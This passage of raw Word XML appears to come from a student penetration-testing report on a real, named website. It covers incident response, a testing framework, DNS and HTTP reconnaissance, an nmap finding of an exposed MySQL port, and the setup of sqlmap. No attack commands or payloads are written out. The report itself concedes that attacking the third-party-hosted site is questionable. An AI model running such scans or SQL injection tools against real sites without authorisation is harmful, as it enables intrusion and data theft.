      </w:r>
    </w:p>
    <w:p w14:paraId="62EA48AF" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2"/>
    <w:p w14:paraId="50F35F4E" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2">
      <w:r>
        <w:t>The first port of call will be determining the nature of the attack, the attacks can range from a simple DDoS to a Crypto Virus spreading throughout the network. Once the threat has been identified it will be easier to manage. Reviewing the output of the IDS can give any network administrator a good idea of the attack taking place. The IDS should detect multiple signs of attacks from multiple failed login attempts which point to a brute force or continuously scanning ports for signs of a security breach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239C053C" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2">
      <w:r>
        <w:t>Once the type of attack has been narrowed down or identified the next step is determining where the attack is happening. The attacks could be happening on a workstation, servers, routers, firewalls, websites or from outside the network itself. If the attack is coming from outside the network finding the area of attack allows us to stop the threat before it does break into the network. To determine if the attack is happening from an outside source</w:t>
      </w:r>
      <w:r w:rsidR="00C72627">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the use of the IDS and firewall logs will help identify the location of the attack. The best way to stop an attack from outside the network is to block the attackers IP address or in the case of a DDoS attack contact the ISP for aid. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338196BB" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2"/>
    <w:p w14:paraId="0D8045CD" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>If the attack is occurring from a device within the network the first response should be to isolate the threat. Cut the threat off from the rest of the network, any malicious virus or attacker can steal or destroy incredibly important data. To isolate the threat the simplest option is to remove all network cables and switch off the machine, once the threat is isolated steps can then be taken to remove any dangers from that device. Any virus such as s Crypto Locker ransomware attack can destroy an entire network if it is not stopped in time, therefore isolating the threat is so essential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D026FFD" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2"/>
    <w:p w14:paraId="318EFE53" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2">
      <w:r>
        <w:t xml:space="preserve">If the threat has caused damage to any data within the network the next stop would be restoring everything damaged through the backups. There should be multiple backup including an offsite and onsite backup. </w:t>
      </w:r>
      <w:r w:rsidR="00C72627">
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> any data has been lost the network can be restored its original state using server snapshots or backups of lost data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BF7F95" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2"/>
    <w:p w14:paraId="2E8E5145" w14:textId="77777777" w:rsidR="007C4513" w:rsidRPr="007C4513" w:rsidRDefault="002165F2" w:rsidP="007C4513">
      <w:r>
        <w:t xml:space="preserve">During the event of a penetration test, any ethical hackers that are attacking the website will have the ability to attempt to attack the website without someone attempting to stop them. </w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:t>If</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> they find a major flaw and the website is taken </w:t>
      </w:r>
      <w:r w:rsidR="00C72627">
        <w:t>offline,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> then it will simply be restored back to its previous state and all finding will be brought forward to attempt to rectify any issues with the website.</w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r w:rsidR="000C4E8B">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D08B40" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc501124780"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>3.Penetration</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing</w:t>
      </w:r>
      <w:r w:rsidR="002165F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="4"/>
      <w:r w:rsidR="002165F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:commentRangeEnd w:id="4"/>
      <w:r w:rsidR="000C4E8B">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="4"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7ADF27" w14:textId="77777777" w:rsidR="00F14567" w:rsidRDefault="00F14567" w:rsidP="00F14567"/>
    <w:p w14:paraId="57CFD141" w14:textId="77777777" w:rsidR="006059FB" w:rsidRPr="00F14567" w:rsidRDefault="00F14567" w:rsidP="00F14567">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc501124781"/>
      <w:r w:rsidRPr="00F14567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidR="006059FB" w:rsidRPr="00F14567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework Breakdown</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="5A9B8EA4" w14:textId="77777777" w:rsidR="002165F2" w:rsidRDefault="002165F2" w:rsidP="002165F2">
      <w:r>
        <w:t>To carry out this penetration test there must a be a framework to base the testing around, there needs to be as logical path to follow when the attacks begin. To do this the use of a pre</w:t>
      </w:r>
      <w:r w:rsidR="006059FB">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">designed framework was used as a base. The use of Kevin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Orrrey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Pen testing framework 0.59 was use</w:t>
      </w:r>
      <w:r w:rsidR="006059FB">
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidR="006059FB">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="006059FB">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://www.vulnerabilityassessment.co.uk/Penetration Test.html", "accessed" : { "date-parts" : [ [ "2017", "12", "8" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Penetration Testing Framework 0.59", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=450abd9b-c085-30ee-88b3-e6ed20682764" ] } ], "mendeley" : { "formattedCitation" : "[1]", "plainTextFormattedCitation" : "[1]", "previouslyFormattedCitation" : "[1]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="006059FB">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006059FB" w:rsidRPr="006059FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="006059FB">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006059FB">
        <w:t xml:space="preserve"> More specifically the penetration aspect of the frame work which focuses on using tools to find exploits to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC163A" w14:textId="77777777" w:rsidR="006059FB" w:rsidRDefault="006059FB" w:rsidP="002165F2"/>
    <w:p w14:paraId="76AD7114" w14:textId="77777777" w:rsidR="006059FB" w:rsidRPr="00F14567" w:rsidRDefault="006059FB" w:rsidP="00F14567">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F14567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Toc501124782"/>
      <w:r w:rsidR="00F14567" w:rsidRPr="00F14567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F14567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Research</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="76D80D70" w14:textId="77777777" w:rsidR="006059FB" w:rsidRDefault="006059FB" w:rsidP="006059FB"/>
    <w:p w14:paraId="59888795" w14:textId="77777777" w:rsidR="00E2213C" w:rsidRDefault="006059FB" w:rsidP="006059FB">
      <w:r>
        <w:t xml:space="preserve">The first stages of this framework began with the research aspect. To better attack the </w:t>
      </w:r>
      <w:r w:rsidR="00C72627">
        <w:t>website,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it was better to find as much information we have on such a website. The first step was to find where the website was hosted. By running an DNS lookup it was discovered the website was hosted by GoDaddy which is an American website hosting company</w:t>
      </w:r>
      <w:r w:rsidR="00DE459D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE459D">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00DE459D">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "https://mxtoolbox.com/SuperTool.aspx?action=http%3A%2F%2Fcupstv.com&amp;run=toolpage#", "accessed" : { "date-parts" : [ [ "2017", "12", "8" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Network Tools: DNS,IP,Email", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=1bd15e8a-3562-33dc-9f48-453803808558" ] } ], "mendeley" : { "formattedCitation" : "[2]", "plainTextFormattedCitation" : "[2]", "previouslyFormattedCitation" : "[2]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00DE459D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE459D" w:rsidRPr="00DE459D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="00DE459D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00DE459D">
        <w:t>. Please see appendices a for evidence.</w:t>
      </w:r>
      <w:r w:rsidR="00E2213C">
        <w:t xml:space="preserve"> The of a HTTP scan was also used to determine GoDaddy uses Apache servers, see appendices b.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C64FBF" w14:textId="77777777" w:rsidR="00DB63F1" w:rsidRDefault="00DB63F1" w:rsidP="006059FB"/>
    <w:p w14:paraId="03EE2C74" w14:textId="77777777" w:rsidR="00DB63F1" w:rsidRPr="00F14567" w:rsidRDefault="00DB63F1" w:rsidP="00F14567">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc501124783"/>
      <w:r w:rsidRPr="00F14567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>3.3 Tools and Attacks</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="632C1E5A" w14:textId="77777777" w:rsidR="00DB63F1" w:rsidRDefault="00DB63F1" w:rsidP="00DB63F1"/>
    <w:p w14:paraId="2E955616" w14:textId="77777777" w:rsidR="00C51864" w:rsidRDefault="00DB63F1" w:rsidP="00DB63F1">
      <w:r>
        <w:t>Once the research on the website has been completed the next stages involve running reconnaissance on the website. By using a various number of scanning tools it’s easy to determine the weaknesses the website has. Once the weaknesses are clear they are simple to exploit, the more information gathered about the website the easier it will be to attack. There will also be a wide variety of attacks that can be implemented, since the website itself is hosted by a third party it is not exactly ethical to attack the website. For the attack stages each attack that can be implemented will be broken down and not implemented</w:t>
      </w:r>
      <w:r w:rsidR="00820336">
        <w:t xml:space="preserve"> to the most aggressive degree</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32145958" w14:textId="77777777" w:rsidR="001B121C" w:rsidRDefault="001B121C" w:rsidP="001B121C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc501124784"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.Tools</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="10"/>
      <w:r w:rsidRPr="001B121C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Used</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:commentRangeEnd w:id="10"/>
      <w:r w:rsidR="000C4E8B">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="10"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B44628" w14:textId="77777777" w:rsidR="00DB63F1" w:rsidRDefault="00DB63F1" w:rsidP="00DB63F1">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF4476C" w14:textId="77777777" w:rsidR="00DB63F1" w:rsidRDefault="00DB63F1" w:rsidP="00F14567">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc501124785"/>
      <w:r w:rsidRPr="00F14567">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.1 NMAP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="3564BA60" w14:textId="77777777" w:rsidR="00820336" w:rsidRPr="00820336" w:rsidRDefault="00820336" w:rsidP="00820336"/>
    <w:p w14:paraId="744EBAEE" w14:textId="77777777" w:rsidR="00DB63F1" w:rsidRDefault="00DB63F1" w:rsidP="00DB63F1">
      <w:r>
        <w:t>This tool is used to scan the website for open ports, if a port is left exposed it can be a prime area to attack</w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "https://nmap.org/", "accessed" : { "date-parts" : [ [ "2017", "12", "8" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "Nmap: the Network Mapper - Free Security Scanner", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=8e9c6f94-dd55-3bae-9d5f-492e3305d812" ] } ], "mendeley" : { "formattedCitation" : "[3]", "plainTextFormattedCitation" : "[3]", "previouslyFormattedCitation" : "[3]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00236B28" w:rsidRPr="00236B28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00425F16">
        <w:t xml:space="preserve"> There are multiple ports that have huge flaws that can be exploited, although there are some ports which will need to be open for the website to run correctly. It is expected port 80 and 443 which are HTTP and HTTPS are open since they are ports used for connections to websites. Please see </w:t>
      </w:r>
      <w:commentRangeStart w:id="12"/>
      <w:r w:rsidR="00425F16">
        <w:t>appendices c</w:t>
      </w:r>
      <w:commentRangeEnd w:id="12"/>
      <w:r w:rsidR="000C4E8B">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="12"/>
      </w:r>
      <w:r w:rsidR="00425F16">
        <w:t xml:space="preserve"> for the results of the port scanner. There are multiple ports open but there is one which is more exposed that others. Port 3306 is currently and exposed, this port is used for MySQL which is used for the database stored within the webserver </w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "9781597499637", "abstract" : "2nd ed. SQL Injection Attacks and Defense, First Edition: Winner of the Best Book Bejtlich Read Award \"SQL injection is probably the number one problem for any server-side application, and this book unequaled in its coverage.\"--Richard Bejtlich, Tao Security blog SQL injection represents one of the most dangerous and well-known, yet misunderstood, security vulnerabilities on the Internet, largely because there is no central repository of information available for penetration testers, IT security consultants and practitioners, and web/software developers to turn to for help. SQL Injection Attacks an. What is SQL injection? -- Testing for SQL injection -- Reviewing code for SQL injection -- Exploiting SQL injection -- Blind SQL injection exploitation -- Exploiting the operating system -- Advanced topics -- Code-level defenses -- Platform level defenses -- Confirming and recovering from SQL injection attacks.", "author" : [ { "dropping-particle" : "", "family" : "Clarke", "given" : "Justin.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2012" ] ] }, "number-of-pages" : "547", "publisher" : "Elsevier", "title" : "SQL injection attacks and defense", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=225c764d-9ef7-36e8-9033-582c3659468b" ] } ], "mendeley" : { "formattedCitation" : "[4]", "plainTextFormattedCitation" : "[4]", "previouslyFormattedCitation" : "[4]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00236B28" w:rsidRPr="00236B28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "9780470881644", "abstract" : "Looks at the techniques of creating applications using PHP with MySQL, with information on such topics as design patterns, complex queries, iterators, closures, caching, PHP extensions, and Sphinx. Techniques every expert programmer needs to know -- Advanced PHP concepts -- MySQL drivers and storage engines -- Improving performance through caching -- Memcached and MySQL -- Advanced MySQL -- Extending MySQL with user-defined functions -- Writing PHP extensions -- Full-text searching -- Multi-tasking in PHP and MySQL -- Rewrite rules -- User authentication -- Understanding the INFORMATION_SCHEMA -- Security -- Command-line and web services -- Optimization and debugging.", "author" : [ { "dropping-particle" : "", "family" : "Curioso", "given" : "Andrew.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Bradford", "given" : "Ronald.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" }, { "dropping-particle" : "", "family" : "Galbraith", "given" : "Patrick.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2010" ] ] }, "number-of-pages" : "587", "publisher" : "Wiley Pub", "title" : "Expert PHP and MySQL", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=3c047f22-8faf-374e-ba8c-aecefbb50ddf" ] } ], "mendeley" : { "formattedCitation" : "[5]", "plainTextFormattedCitation" : "[5]", "previouslyFormattedCitation" : "[5]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00236B28" w:rsidRPr="00236B28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00425F16">
        <w:t>. This database holds all key information for the website which ranges from basic information such as pictures or articles to a list of users and their password hashes. If this information is found using exploits the passwords would most likely be easy to crack which would then make damaging the website a basic task</w:t>
      </w:r>
      <w:r w:rsidR="00820336">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "ISBN" : "0071605509", "abstract" : "Includes index. An introduction to MySQL -- Understanding basic commands -- Making design decisions -- Using joins, subqueries, and views -- Using transactions -- Using stored procedures and functions -- Using triggers and scheduled events -- Working with data in different formats -- Optimizing performance -- Performing basic server administration -- Managing users and controlling access -- Performing maintenance, backup, and recovery -- Replicating data -- Installing MySQL and the sample database.", "author" : [ { "dropping-particle" : "", "family" : "Vaswani", "given" : "Vikram.", "non-dropping-particle" : "", "parse-names" : false, "suffix" : "" } ], "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "2010" ] ] }, "number-of-pages" : "348", "publisher" : "McGraw-Hill", "title" : "MySQL database usage &amp;amp; administration", "type" : "book" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=a5541071-d3ad-36d6-9e99-e384b8010ea1" ] } ], "mendeley" : { "formattedCitation" : "[6]", "plainTextFormattedCitation" : "[6]", "previouslyFormattedCitation" : "[6]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00236B28" w:rsidRPr="00236B28">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r w:rsidR="00236B28">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00425F16">
        <w:t>. The attacks that can be used against this port will be discussed in section 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B66364C" w14:textId="77777777" w:rsidR="00236B28" w:rsidRDefault="00236B28" w:rsidP="00DB63F1"/>
    <w:p w14:paraId="6B3DC292" w14:textId="77777777" w:rsidR="003123EE" w:rsidRPr="00C24692" w:rsidRDefault="003123EE" w:rsidP="00C24692">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc501124786"/>
      <w:r w:rsidRPr="00C24692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.2 SQL Map</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3B5E4763" w14:textId="77777777" w:rsidR="003123EE" w:rsidRDefault="003123EE" w:rsidP="003123EE"/>
    <w:p w14:paraId="2AE56D9E" w14:textId="77777777" w:rsidR="00B664F9" w:rsidRDefault="003123EE" w:rsidP="00DB63F1">
      <w:r>
        <w:t>This tool is used to check for vulnerabilities within a webserver, this tool focuses on SQL related flaws. For this test Python V27 was installed, the SQL Map package was then added to the Python27 folder with the C:\ drive to combine the two. To begin the testing command prompt was accessed and commands were entered to begin the tool. Please see appendices d for the commands used</w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:instrText>ADDIN CSL_CITATION { "citationItems" : [ { "id" : "ITEM-1", "itemData" : { "URL" : "http://sqlmap.org/", "accessed" : { "date-parts" : [ [ "2017", "12", "8" ] ] }, "id" : "ITEM-1", "issued" : { "date-parts" : [ [ "0" ] ] }, "title" : "sqlmap: automatic SQL injection and database takeover tool", "type" : "webpage" }, "uris" : [ "http://www.mendeley.com/documents/?uuid=8198a50e-eb99-3d00-a08f-dca200462b97" ] } ], "mendeley" : { "formattedCitation" : "[7]", "plainTextFormattedCitation" : "[7]", "previouslyFormattedCitation" : "[7]" }, "properties" : {  }, "schema" : "https://github.com/citation-style-language/schema/raw/master/csl-citation.json" }</w:instrText>
      </w:r>
      <w:r w:rsidR="00EA0BDD">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EA0BDD" w:rsidRPr="00EA0BDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
